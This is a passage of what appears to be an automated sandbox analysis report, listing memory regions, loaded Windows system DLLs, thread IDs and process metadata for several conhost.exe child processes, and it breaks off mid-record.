mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 4475 start_va = 0xc567950000 end_va = 0xc56798ffff entry_point = 0x0 region_type = private name = "private_0x000000c567950000" filename = "" Region: id = 4476 start_va = 0xc567990000 end_va = 0xc56799ffff entry_point = 0x0 region_type = private name = "private_0x000000c567990000" filename = "" Region: id = 4477 start_va = 0xc569150000 end_va = 0xc569266fff entry_point = 0x0 region_type = private name = "private_0x000000c569150000" filename = "" Region: id = 4478 start_va = 0xc569270000 end_va = 0xc56927ffff entry_point = 0x0 region_type = private name = "private_0x000000c569270000" filename = "" Region: id = 4479 start_va = 0xc569280000 end_va = 0xc5695b6fff entry_point = 0xc569280000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4480 start_va = 0xc5695c0000 end_va = 0xc5697d6fff entry_point = 0x0 region_type = private name = "private_0x000000c5695c0000" filename = "" Region: id = 4481 start_va = 0xc5697e0000 end_va = 0xc5699f2fff entry_point = 0x0 region_type = private name = "private_0x000000c5697e0000" filename = "" Region: id = 4482 start_va = 0xc569a00000 end_va = 0xc569c10fff entry_point = 0x0 region_type = private name = "private_0x000000c569a00000" filename = "" Region: id = 4483 start_va = 0xc569c20000 end_va = 0xc569d2cfff entry_point = 0x0 region_type = private name = "private_0x000000c569c20000" filename = "" Region: id = 4484 start_va = 0x7ff6c3dea000 end_va = 0x7ff6c3debfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3dea000" filename = "" Region: id = 4485 start_va = 0x7ffbff170000 end_va = 0x7ffbff205fff entry_point = 0x7ffbff170000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 4486 start_va = 0x7ffc008a0000 end_va = 0x7ffc008e9fff entry_point = 0x7ffc008a0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 4487 start_va = 0x7ffc008f0000 end_va = 0x7ffc00902fff entry_point = 0x7ffc008f0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 4488 start_va = 0x7ffc00910000 end_va = 0x7ffc0091efff entry_point = 0x7ffc00910000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 4489 start_va = 0x7ffc00940000 end_va = 0x7ffc00f67fff entry_point = 0x7ffc00940000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 4490 start_va = 0x7ffc00fc0000 end_va = 0x7ffc01072fff entry_point = 0x7ffc00fc0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 4491 start_va = 0x7ffc01640000 end_va = 0x7ffc016e5fff entry_point = 0x7ffc01640000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 4492 start_va = 0x7ffc022c0000 end_va = 0x7ffc037e4fff entry_point = 0x7ffc022c0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 4493 start_va = 0x7ffc03a50000 end_va = 0x7ffc03aa0fff entry_point = 0x7ffc03a50000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Thread: id = 143 os_tid = 0xf64 Thread: id = 188 os_tid = 0xa14 Thread: id = 224 os_tid = 0x1084 Thread: id = 297 os_tid = 0x11d4 Process: id = "113" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0xfa5c000" os_pid = "0xf68" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "70" os_parent_pid = "0xe04" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2257 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2258 start_va = 0xc5e7c60000 end_va = 0xc5e7c7ffff entry_point = 0x0 region_type = private name = "private_0x000000c5e7c60000" filename = "" Region: id = 2259 start_va = 0xc5e7c80000 end_va = 0xc5e7c93fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c5e7c80000" filename = "" Region: id = 2260 start_va = 0xc5e7ca0000 end_va = 0xc5e7cdffff entry_point = 0x0 region_type = private name = "private_0x000000c5e7ca0000" filename = "" Region: id = 2261 start_va = 0x7df5ff2e0000 end_va = 0x7ff5ff2dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff2e0000" filename = "" Region: id = 2262 start_va = 0x7ff6c4140000 end_va = 0x7ff6c4162fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4140000" filename = "" Region: id = 2263 start_va = 0x7ff6c416c000 end_va = 0x7ff6c416cfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c416c000" filename = "" Region: id = 2264 start_va = 0x7ff6c416e000 end_va = 0x7ff6c416ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c416e000" filename = "" Region: id = 2265 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 2266 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2267 start_va = 0xc5e7ce0000 end_va = 0xc5e7ddffff entry_point = 0x0 region_type = private name = "private_0x000000c5e7ce0000" filename = "" Region: id = 2268 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2269 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3030 start_va = 0xc5e7c60000 end_va = 0xc5e7c6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c5e7c60000" filename = "" Region: id = 3031 start_va = 0xc5e7c70000 end_va = 0xc5e7c76fff entry_point = 0x0 region_type = private name = "private_0x000000c5e7c70000" filename = "" Region: id = 3032 start_va = 0xc5e7de0000 end_va = 0xc5e7e9dfff entry_point = 0xc5e7de0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3033 start_va = 0xc5e7ea0000 end_va = 0xc5e7edffff entry_point = 0x0 region_type = private name = "private_0x000000c5e7ea0000" filename = "" Region: id = 3034 start_va = 0xc5e7ee0000 end_va = 0xc5e7ee0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c5e7ee0000" filename = "" Region: id = 3035 start_va = 0xc5e7ef0000 end_va = 0xc5e7ef6fff entry_point = 0x0 region_type = private name = "private_0x000000c5e7ef0000" filename = "" Region: id = 3036 start_va = 0xc5e7f00000 end_va = 0xc5e7f00fff entry_point = 0x0 region_type = private name = "private_0x000000c5e7f00000" filename = "" Region: id = 3037 start_va = 0xc5e7f10000 end_va = 0xc5e7f10fff entry_point = 0x0 region_type = private name = "private_0x000000c5e7f10000" filename = "" Region: id = 3038 start_va = 0xc5e8080000 end_va = 0xc5e808ffff entry_point = 0x0 region_type = private name = "private_0x000000c5e8080000" filename = "" Region: id = 3039 start_va = 0xc5e8090000 end_va = 0xc5e8217fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c5e8090000" filename = "" Region: id = 3040 start_va = 0xc5e8220000 end_va = 0xc5e83a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c5e8220000" filename = "" Region: id = 3041 start_va = 0xc5e83b0000 end_va = 0xc5e97affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c5e83b0000" filename = "" Region: id = 3042 start_va = 0x7ff6c4040000 end_va = 0x7ff6c413ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4040000" filename = "" Region: id = 3043 start_va = 0x7ff6c416a000 end_va = 0x7ff6c416bfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c416a000" filename = "" Region: id = 3044 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 3045 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 3046 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 3047 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 3048 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3049 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3050 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3051 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3052 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 3053 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3054 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 3055 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 4446 start_va = 0xc5e7f20000 end_va = 0xc5e7f5ffff entry_point = 0x0 region_type = private name = "private_0x000000c5e7f20000" filename = "" Region: id = 4447 start_va = 0xc5e7f60000 end_va = 0xc5e8075fff entry_point = 0x0 region_type = private name = "private_0x000000c5e7f60000" filename = "" Region: id = 4448 start_va = 0xc5e97b0000 end_va = 0xc5e98c2fff entry_point = 0x0 region_type = private name = "private_0x000000c5e97b0000" filename = "" Region: id = 4449 start_va = 0xc5e98e0000 end_va = 0xc5e98effff entry_point = 0x0 region_type = private name = "private_0x000000c5e98e0000" filename = "" Region: id = 4450 start_va = 0xc5e9930000 end_va = 0xc5e993ffff entry_point = 0x0 region_type = private name = "private_0x000000c5e9930000" filename = "" Region: id = 4451 start_va = 0xc5e9940000 end_va = 0xc5e9c76fff entry_point = 0xc5e9940000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4452 start_va = 0xc5e9c80000 end_va = 0xc5e9e93fff entry_point = 0x0 region_type = private name = "private_0x000000c5e9c80000" filename = "" Region: id = 4453 start_va = 0xc5e9ea0000 end_va = 0xc5ea0bcfff entry_point = 0x0 region_type = private name = "private_0x000000c5e9ea0000" filename = "" Region: id = 4454 start_va = 0xc5ea0c0000 end_va = 0xc5ea2dafff entry_point = 0x0 region_type = private name = "private_0x000000c5ea0c0000" filename = "" Region: id = 4455 start_va = 0x7ff6c4168000 end_va = 0x7ff6c4169fff entry_point = 0x0 region_type = private name = "private_0x00007ff6c4168000" filename = "" Region: id = 4456 start_va = 0x7ffbff170000 end_va = 0x7ffbff205fff entry_point = 0x7ffbff170000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 4457 start_va = 0x7ffc008a0000 end_va = 0x7ffc008e9fff entry_point = 0x7ffc008a0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 4458 start_va = 0x7ffc008f0000 end_va = 0x7ffc00902fff entry_point = 0x7ffc008f0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 4459 start_va = 0x7ffc00910000 end_va = 0x7ffc0091efff entry_point = 0x7ffc00910000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 4460 start_va = 0x7ffc00940000 end_va = 0x7ffc00f67fff entry_point = 0x7ffc00940000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 4461 start_va = 0x7ffc00fc0000 end_va = 0x7ffc01072fff entry_point = 0x7ffc00fc0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 4462 start_va = 0x7ffc01640000 end_va = 0x7ffc016e5fff entry_point = 0x7ffc01640000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 4463 start_va = 0x7ffc022c0000 end_va = 0x7ffc037e4fff entry_point = 0x7ffc022c0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 4464 start_va = 0x7ffc03a50000 end_va = 0x7ffc03aa0fff entry_point = 0x7ffc03a50000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Thread: id = 144 os_tid = 0xf6c Thread: id = 189 os_tid = 0xaf4 Thread: id = 225 os_tid = 0x1088 Thread: id = 296 os_tid = 0x11d0 Process: id = "114" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0xfa5f000" os_pid = "0xf70" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "71" os_parent_pid = "0xe0c" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2270 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2271 start_va = 0xa754490000 end_va = 0xa7544affff entry_point = 0x0 region_type = private name = "private_0x000000a754490000" filename = "" Region: id = 2272 start_va = 0xa7544b0000 end_va = 0xa7544c3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a7544b0000" filename = "" Region: id = 2273 start_va = 0xa7544d0000 end_va = 0xa75450ffff entry_point = 0x0 region_type = private name = "private_0x000000a7544d0000" filename = "" Region: id = 2274 start_va = 0x7df5ffbd0000 end_va = 0x7ff5ffbcffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffbd0000" filename = "" Region: id = 2275 start_va = 0x7ff6c4060000 end_va = 0x7ff6c4082fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4060000" filename = "" Region: id = 2276 start_va = 0x7ff6c408d000 end_va = 0x7ff6c408dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c408d000" filename = "" Region: id = 2277 start_va = 0x7ff6c408e000 end_va = 0x7ff6c408ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c408e000" filename = "" Region: id = 2278 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 2279 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2280 start_va = 0xa754680000 end_va = 0xa75477ffff entry_point = 0x0 region_type = private name = "private_0x000000a754680000" filename = "" Region: id = 2281 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2282 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3056 start_va = 0xa754490000 end_va = 0xa75449ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a754490000" filename = "" Region: id = 3057 start_va = 0xa7544a0000 end_va = 0xa7544a6fff entry_point = 0x0 region_type = private name = "private_0x000000a7544a0000" filename = "" Region: id = 3058 start_va = 0xa754510000 end_va = 0xa7545cdfff entry_point = 0xa754510000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3059 start_va = 0xa7545d0000 end_va = 0xa75460ffff entry_point = 0x0 region_type = private name = "private_0x000000a7545d0000" filename = "" Region: id = 3060 start_va = 0xa754610000 end_va = 0xa754610fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a754610000" filename = "" Region: id = 3061 start_va = 0xa754620000 end_va = 0xa754626fff entry_point = 0x0 region_type = private name = "private_0x000000a754620000" filename = "" Region: id = 3062 start_va = 0xa754630000 end_va = 0xa754630fff entry_point = 0x0 region_type = private name = "private_0x000000a754630000" filename = "" Region: id = 3063 start_va = 0xa754640000 end_va = 0xa754640fff entry_point = 0x0 region_type = private name = "private_0x000000a754640000" filename = "" Region: id = 3064 start_va = 0xa7548a0000 end_va = 0xa7548affff entry_point = 0x0 region_type = private name = "private_0x000000a7548a0000" filename = "" Region: id = 3065 start_va = 0xa7548b0000 end_va = 0xa754a37fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a7548b0000" filename = "" Region: id = 3066 start_va = 0xa754a40000 end_va = 0xa754bc0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a754a40000" filename = "" Region: id = 3067 start_va = 0xa754bd0000 end_va = 0xa755fcffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a754bd0000" filename = "" Region: id = 3068 start_va = 0x7ff6c3f60000 end_va = 0x7ff6c405ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c3f60000" filename = "" Region: id = 3069 start_va = 0x7ff6c408b000 end_va = 0x7ff6c408cfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c408b000" filename = "" Region: id = 3070 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 3071 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 3072 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 3073 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 3074 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3075 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3076 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3077 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3078 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 3079 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3080 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 3081 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 4427 start_va = 0xa7547b0000 end_va = 0xa7547bffff entry_point = 0x0 region_type = private name = "private_0x000000a7547b0000" filename = "" Region: id = 4428 start_va = 0xa7547c0000 end_va = 0xa7547fffff entry_point = 0x0 region_type = private name = "private_0x000000a7547c0000" filename = "" Region: id = 4429 start_va = 0xa755fd0000 end_va = 0xa7560e6fff entry_point = 0x0 region_type = private name = "private_0x000000a755fd0000" filename = "" Region: id = 4430 start_va = 0xa7561a0000 end_va = 0xa7561affff entry_point = 0x0 region_type = private name = "private_0x000000a7561a0000" filename = "" Region: id = 4431 start_va = 0xa7561b0000 end_va = 0xa7564e6fff entry_point = 0xa7561b0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4432 start_va = 0xa7564f0000 end_va = 0xa756702fff entry_point = 0x0 region_type = private name = "private_0x000000a7564f0000" filename = "" Region: id = 4433 start_va = 0xa756710000 end_va = 0xa756920fff entry_point = 0x0 region_type = private name = "private_0x000000a756710000" filename = "" Region: id = 4434 start_va = 0xa756930000 end_va = 0xa756b47fff entry_point = 0x0 region_type = private name = "private_0x000000a756930000" filename = "" Region: id = 4435 start_va = 0xa756b50000 end_va = 0xa756c66fff entry_point = 0x0 region_type = private name = "private_0x000000a756b50000" filename = "" Region: id = 4436 start_va = 0x7ff6c4089000 end_va = 0x7ff6c408afff entry_point = 0x0 region_type = private name = "private_0x00007ff6c4089000" filename = "" Region: id = 4437 start_va = 0x7ffbff170000 end_va = 0x7ffbff205fff entry_point = 0x7ffbff170000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 4438 start_va = 0x7ffc008a0000 end_va = 0x7ffc008e9fff entry_point = 0x7ffc008a0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 4439 start_va = 0x7ffc008f0000 end_va = 0x7ffc00902fff entry_point = 0x7ffc008f0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 4440 start_va = 0x7ffc00910000 end_va = 0x7ffc0091efff entry_point = 0x7ffc00910000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 4441 start_va = 0x7ffc00940000 end_va = 0x7ffc00f67fff entry_point = 0x7ffc00940000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 4442 start_va = 0x7ffc00fc0000 end_va = 0x7ffc01072fff entry_point = 0x7ffc00fc0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 4443 start_va = 0x7ffc01640000 end_va = 0x7ffc016e5fff entry_point = 0x7ffc01640000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 4444 start_va = 0x7ffc022c0000 end_va = 0x7ffc037e4fff entry_point = 0x7ffc022c0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 4445 start_va = 0x7ffc03a50000 end_va = 0x7ffc03aa0fff entry_point = 0x7ffc03a50000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Thread: id = 145 os_tid = 0xf74 Thread: id = 190 os_tid = 0xb10 Thread: id = 226 os_tid = 0x108c Thread: id = 294 os_tid = 0x11c8 Process: id = "115" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0xfb3e000" os_pid = "0xf78" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "72" os_parent_pid = "0xe14" cmd_line = 